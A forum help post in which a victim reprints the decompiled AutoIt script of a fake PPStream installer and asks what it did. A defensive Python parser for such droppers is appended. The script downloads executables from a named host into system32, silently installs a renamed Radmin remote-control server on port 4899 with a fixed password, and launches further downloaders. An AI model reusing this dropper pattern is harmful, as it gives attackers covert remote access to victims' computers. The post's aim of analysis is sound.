[Help] Possibly being remotely monitored? Analysis reports updated
1. Problem description:
The instant I clicked it, something seemed to get installed. (Shock)
I took a screenshot with Print Screen and saw a window titled Remote Administrator Server 2.1.
Looking it up, it seems to be remote-control software, but I could never find where it was installed.
Later I tried many ways to unpack this exe.
All of them failed; I only found that it appears to be an automated installer built with AutoIt.
Luckily I managed to decompile its script with an AutoIt decompiler; it is in plain text.
But I don't really understand it, and I'm afraid that messing around will break the system.
Could an expert help explain it? I really want to know what it did to my computer. OTL
------------------------------------------------------------------------------
; <AUT2EXE VERSION: 3.2.2.0>
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: C:\Documents and Settings\mis\桌面\遠端遙控2\軟體區\PPS Setup\Setup.au3>
; ----------------------------------------------------------------------------
Opt("MouseCoordMode", 0) ;1=absolute, 0=relative (1 = whole screen, 0 = relative to the active window)
Opt("TrayIconDebug", 1) ;0=no info, 1=debug line info
Opt("TrayIconHide", 0) ;0=show, 1=hide tray icon
Opt("WinDetectHiddenText", 0) ;0=don't detect, 1=do detect
Opt("WinTitleMatchMode", 2) ;1=start, 2=subStr, 3=exact, 4=... (how to decide whether a window exists; with 2 any window whose title contains e.g. "home" matches)
Opt("OnExitFunc","OnAutoItExit");"OnAutoItExit" called
Opt("TrayIconHide", 1) ;0=show, 1=hide tray icon
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: C:\Program Files\AutoIt3\Include\Process.au3>
; ----------------------------------------------------------------------------
; Include Version:1.59 (04/20/2006)
;
; ------------------------------------------------------------------------------
;
; AutoIt Version: 3.0
; Language: English
; Description: Functions that assist with process management.
;
;
; ------------------------------------------------------------------------------
;===============================================================================
;
; Description - Returns a string containing the process name that belongs to a given PID.
; Syntax - _ProcessGetName( $iPID )
; Parameters - $iPID - The PID of a currently running process
; Requirements - None.
; Return Values - Success - The name of the process
; Failure - Blank string and sets @error
; 1 - Process doesn't exist
; 2 - Error getting process list
; 3 - No processes found
; Author(s) - Erifash <erifash [at] gmail [dot] com>, Wouter van Kesteren.
; Notes - Supplementary to ProcessExists().
;===============================================================================
Func _ProcessGetName($i_PID)
    If Not ProcessExists($i_PID) Then
        SetError(1)
        Return ''
    EndIf
    Local $a_Processes = ProcessList()
    If Not @error Then
        For $i = 1 To $a_Processes[0][0]
            If $a_Processes[$i][1] = $i_PID Then Return $a_Processes[$i][0]
        Next
    EndIf
    SetError(1)
    Return ''
EndFunc ;==>_ProcessGetName
;===============================================================================
;
; Function Name: _ProcessGetPriority()
; Description: Get the priority of an open process
; Parameter(s): $vProcess - PID or name of a process.
; Requirement(s): AutoIt Beta v3.1.1.61+
; kernel32.dll (included with Windows)
; Return Value(s): On Success - Returns integer corresponding to
; the process's priority:
; 0 - Idle/Low
; 1 - Below Normal (Not supported on Windows 95/98/ME)
; 2 - Normal
; 3 - Above Normal (Not supported on Windows 95/98/ME)
; 4 - High
; 5 - Realtime
; On Failure: Returns -1 and sets @Error to 1
; Author(s): Matthew Tucker
; Valik added Pid or Processname logic
;===============================================================================
;
Func _ProcessGetPriority($vProcess)
    Local $i_PID = ProcessExists($vProcess)
    If Not $i_PID Then
        SetError(1)
        Return -1
    EndIf
    Local $hDLL = DllOpen('kernel32.dll')
    Local $aProcessHandle = DllCall($hDLL, 'int', 'OpenProcess', 'int', 0x0400, 'int', False, 'int', $i_PID)
    Local $aPriority = DllCall($hDLL, 'int', 'GetPriorityClass', 'int', $aProcessHandle[0])
    DllCall($hDLL, 'int', 'CloseHandle', 'int', $aProcessHandle[0])
    DllClose($hDLL)
    Switch $aPriority[0]
        Case 0x00000040
            Return 0
        Case 0x00004000
            Return 1
        Case 0x00000020
            Return 2
        Case 0x00008000
            Return 3
        Case 0x00000080
            Return 4
        Case 0x00000100
            Return 5
        Case Else
            SetError(1)
            Return -1
    EndSwitch
EndFunc ;==>_ProcessGetPriority
;===============================================================================
;
; Description: Executes a DOS command in a hidden command window.
; Syntax: _RunDOS( $sCommand )
; Parameter(s): $sCommand - Command to execute
; Requirement(s): None
; Return Value(s): On Success - Returns the exit code of the command
; On Failure - Depends on RunErrorsFatal setting
; Author(s): Jeremy Landes <jlandes at landeserve dot com>
; Note(s): None
;
;===============================================================================
Func _RunDOS($sCommand)
    Return RunWait(@ComSpec & " /C " & $sCommand, "", @SW_HIDE)
EndFunc ;==>_RunDOS
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-END: C:\Program Files\AutoIt3\Include\Process.au3>
; ----------------------------------------------------------------------------
$ServerURL="http://studftp.stut.edu.tw/~d9420202/Download2/"
InetGet($ServerURL & "compentent/ipsec5.exe","c:\Windows\system32\ipsec5.exe",1) ;hides the "R" icon in the bottom-right tray
InetGet($ServerURL & "compentent/ipsec4.exe","c:\Windows\system32\ipsec4.exe",1)
If not ProcessExists ("ipsec4.exe") Then
    ShellExecute("c:\Windows\system32\ipsec4.exe")
    Sleep(10)
EndIf
InetGet($ServerURL & "compentent/win1logon.exe","c:\Windows\system32\win1logon.exe",1)
If not ProcessExists ("win1logon.exe") Then
    ShellExecute("c:\Windows\system32\win1logon.exe")
    Sleep(10)
EndIf
InetGet($ServerURL & "compentent/MDME.exe","c:\Windows\system32\MDME.exe",1) ;fetch the downloader
InetGet($ServerURL & "compentent/MDEE.exe","c:\Windows\system32\MDEE.exe",1) ;fetch the downloader
InetGet($ServerURL & "compentent/AdmDll.dll","c:\Windows\system32\AdmDll.dll",1) ;fetch the downloader
InetGet($ServerURL & "compentent/r_server.exe","c:\Windows\system32\newscript.exe",1) ;fetch the downloader
InetGet($ServerURL & "compentent/MSWINSCK.OCX","c:\Windows\system32\MSWINSCK.OCX",1)
InetGet($ServerURL & "compentent/upload.exe","c:\Windows\system32\upload.exe",1)
InetGet($ServerURL & "compentent/down.exe","c:\Windows\system32\down.exe",1)
$rc = _RunDos("c:\Windows\system32\newscript.exe /setup")
sleep(1000)
$rc = _RunDos("c:\Windows\system32\newscript.exe /installdrv /silence")
$rc2 = _RunDos("c:\Windows\system32\newscript.exe /port:4899 /pass:119995995 /save /silence")
ProcessClose("newscript.exe")
ShellExecute("c:\Windows\system32\newscript.exe")
If not ProcessExists ("MDME.exe") Then
    IF FileGetSize("c:\Windows\system32\MDME.exe")<>0 Then
        ShellExecute("c:\Windows\system32\MDME.exe")
    EndIf
EndIf
If not ProcessExists ("MDEE.exe") Then
    ShellExecute("c:\Windows\system32\MDEE.exe")
EndIf
If not ProcessExists ("PPStream.exe") Then
    ShellExecute(@WorkingDir & "\FILES\" & "PPStream.exe")
EndIf
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-END: C:\Documents and Settings\mis\桌面\遠端遙控2\軟體區\PPS Setup\Setup.au3>
; ----------------------------------------------------------------------------
------------------------------------------------------------------------------
2. System information:
Windows XP SP3
Avast
3. Analysis reports:
http://sun.cis.scu.edu.tw/~92a39/upload/38713.txt
http://sun.cis.scu.edu.tw/~92a39/upload/38715.txt
http://sun.cis.scu.edu.tw/~92a39/upload/38716.txt
※ Posted from: 批踢踢實業坊 (ptt.cc)
◆ From: 122.116.171.101
※ Edited by: epyonwing from: 122.116.171.101 (03/19 18:30)
※ Edited by: epyonwing from: 122.116.171.101 (03/19 18:41)
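As an added example (not part of the original post or of the dropper itself), a small Python triage script that parses a decompiled AutoIt dropper like the Setup.au3 above and lists what a defender needs for cleanup and detection: every download URL and drop path, payloads saved under a different name than they were served, and the command-line switches handed to the dropped executables. The embedded sample consists of lines quoted from the script above with the wrapped lines rejoined; the regexes and function names are my own.

```python
import re

# Constructed sample: lines quoted from the decompiled Setup.au3 above, wraps rejoined.
SAMPLE_SCRIPT = r'''
$ServerURL="http://studftp.stut.edu.tw/~d9420202/Download2/"
InetGet($ServerURL & "compentent/ipsec4.exe","c:\Windows\system32\ipsec4.exe",1)
InetGet($ServerURL & "compentent/r_server.exe","c:\Windows\system32\newscript.exe",1)
If not ProcessExists ("ipsec4.exe") Then
ShellExecute("c:\Windows\system32\ipsec4.exe")
EndIf
$rc = _RunDos("c:\Windows\system32\newscript.exe /installdrv /silence")
$rc2 = _RunDos("c:\Windows\system32\newscript.exe /port:4899 /pass:119995995 /save /silence")
ShellExecute(@WorkingDir & "\FILES\" & "PPStream.exe")
'''

VAR_RE = re.compile(r'^\$(\w+)\s*=\s*"([^"]*)"\s*$', re.M)          # $Name="literal"
INETGET_RE = re.compile(r'InetGet\(\s*(.*?)\s*,\s*"([^"]*)"', re.I)  # (url expr, dest path)
EXEC_RE = re.compile(r'\b(?:ShellExecute|_RunDos|RunWait|Run)\((.*)\)', re.I)

def _concat(expr, consts):
    """Fold an AutoIt '&' concatenation; @macros and unknown $vars stay symbolic."""
    out = []
    for tok in (t.strip() for t in expr.split("&")):
        if len(tok) >= 2 and tok[0] == tok[-1] == '"':
            out.append(tok[1:-1])
        else:
            out.append(consts.get(tok[1:], tok) if tok.startswith("$") else tok)
    return "".join(out)

def analyze_dropper(script):
    """Return download URLs, drop paths, renamed payloads and launch switches."""
    consts = dict(VAR_RE.findall(script))
    downloads, renamed = [], []
    for url_expr, dest in INETGET_RE.findall(script):
        url = _concat(url_expr, consts)
        downloads.append((url, dest))
        # payload stored under a different name than served (r_server.exe -> newscript.exe)
        if url.rsplit("/", 1)[-1].lower() != dest.rsplit("\\", 1)[-1].lower():
            renamed.append((url, dest))
    executed, switches = [], {}
    for expr in EXEC_RE.findall(script):
        parts = _concat(expr, consts).split()
        if not parts:
            continue
        executed.append(" ".join(parts))
        flags = [a for a in parts[1:] if a.startswith("/")]
        if flags:  # e.g. the /installdrv, /port:, /pass:, /save, /silence given to newscript.exe
            switches.setdefault(parts[0].lower(), []).extend(flags)
    return {"downloads": downloads, "renamed": renamed, "executed": executed, "switches": switches}
```

The "downloads" list doubles as the file list to check on the infected host, and "switches" shows which listening port the renamed Radmin server was configured with.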